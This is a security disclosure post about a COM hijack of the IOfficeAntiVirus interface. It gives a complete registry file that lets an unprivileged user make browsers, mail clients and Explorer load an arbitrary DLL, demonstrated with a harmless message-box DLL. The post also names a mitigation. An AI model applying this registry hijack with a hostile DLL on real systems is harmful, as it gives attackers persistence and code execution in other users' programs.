Hi @ll,

this is the continuation of the previous posts
<https://seclists.org/fulldisclosure/2020/Mar/45> and
<https://seclists.org/fulldisclosure/2020/Mar/48>.


(Un)fortunately the IOfficeAntiVirus interface (see
<https://support.microsoft.com/en-us/help/914922/microsoft-windows-defender-helps-provide-real-time-protection>)
has at least another weakness which also allows (unprivileged users) to
load arbitrary DLLs into web browsers, mail/news clients, instant
messengers, file explorer and every other program which calls this COM
 interface.


With Windows 2000, Microsoft introduced the "merged view" of the
[HKEY_CLASSES_ROOT] virtual registry tree: see
<https://msdn.microsoft.com/en-us/library/ms724498.aspx>

"Thanks" to this feature, COM categories/classes/interfaces registered
by (unprivileged) users below [HKEY_CURRENT_USER\Software\Classes]
obscure the corresponding COM categories/classes/interfaces registered
(by administrators) below [HKEY_LOCAL_MACHINE\SOFTWARE\Classes]


Demonstration:
~~~~~~~~~~~~~~

On a 32-bit installation of Windows XP SP2 or any newer version of
Windows perform the following steps (adaption for 64-bit installations
is left as an exercise to the reader):

1. Log on to an arbitrary (unprivileged) user account.

2. Download <https://skanthak.homepage.t-online.de/download/SENTINEL.DLL>
   and save it in an arbitrary directory.

3. Create a text file SENTINEL.REG with the following contents:

--- SENTINEL.REG ---
REGEDIT4

[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}]
@="Vulnerability and Exploit Detector"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Implemented
Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]
@="MSOfficeAntiVirus"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32]
@="<path>\\SENTINEL.DLL" ; replace <path> with the directory used in step 2. 
"ThreadingModel"="Both"

; NOTE: the following entries are optional!

[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\TreatAs]
@="{56FFCC31-D398-11D0-B2AE-00A0C908FA49}"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]
@="IOfficeAntiVirus"

[HKEY_CURRENT_USER\Software\Classes\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]
@="IOfficeAntiVirus"

[HKEY_CURRENT_USER\Software\Classes\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\BaseInterface]
@="{00000000-0000-0000-C000-000000000046}" ; IUnknown

[HKEY_CURRENT_USER\Software\Classes\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\NumMethods]
@="4"
--- EOF ---

4. Double-click the file SENTINEL.REG to merge it into the user's
   registry.

5. Download an arbitrary file with your web browser, for example
   <https://skanthak.homepage.t-online.de/download/SENTINEL.DLL>,
   or save an attachment in your mail client, and notice the
   message boxes displayed from the sentinels.


NOTE: the batch script
      <https://skanthak.homepage.t-online.de/download/MSOAV.CMD>
      performs all these steps on 32-bit and 64-bit installations
      of Windows XP and newer versions of Windows.


Mitigation:
~~~~~~~~~~~

Use AppLocker or SAFER alias Software Restriction Policies: see
<https://skanthak.homepage.t-online.de/SAFER.html>


stay tuned, and NEVER use Windows without SAFER or AppLocker
Stefan Kanthak